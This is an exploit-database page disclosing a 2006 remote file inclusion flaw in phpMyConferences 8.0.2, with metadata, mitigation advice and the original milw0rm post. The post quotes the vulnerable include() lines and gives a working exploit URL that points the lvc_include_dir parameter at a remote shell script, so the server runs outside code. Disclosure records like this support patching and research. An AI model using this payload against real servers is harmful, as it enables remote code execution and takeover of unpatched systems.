header-logo
Suggest Exploit
vendor:
phpMyConferences
by:
k1tk4t
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: phpMyConferences
Affected Version From: 8.0.2
Affected Version To: 8.0.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpmyconferences:phpmyconferences:8.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpMyConferences <= 8.0.2 Remote File Inclusion

phpMyConferences is vulnerable to a remote file inclusion vulnerability. This vulnerability exists due to insufficient sanitization of user-supplied input to the 'lvc_include_dir' parameter in the 'menus.inc.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by including a malicious file from a remote location.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of phpMyConferences.
Source

Exploit-DB raw data:

#########################################################################
# phpMyConferences <= 8.0.2 Remote File Inclusion
# Download Source : http://sedre.loria.fr/phpMyConference/phpMyConferences_8.0.2.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org
########################################################################
file ;
 menus.inc.php
########################################################################
bugs ;
 include($lvc_include_dir.'/menus-'.$view.'.inc.php');
 include($lvc_include_dir.'/menus-others.inc.php');
########################################################################
exmple and methode exploit ;
 http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=http://shell/cmd.kid?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
#asiahacker
person;
y3dips,lirva32,the_day,K-159(&all echo staff)
evilcode,illibero,NoGe(asiahacker),
nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)

# milw0rm.com [2006-10-13]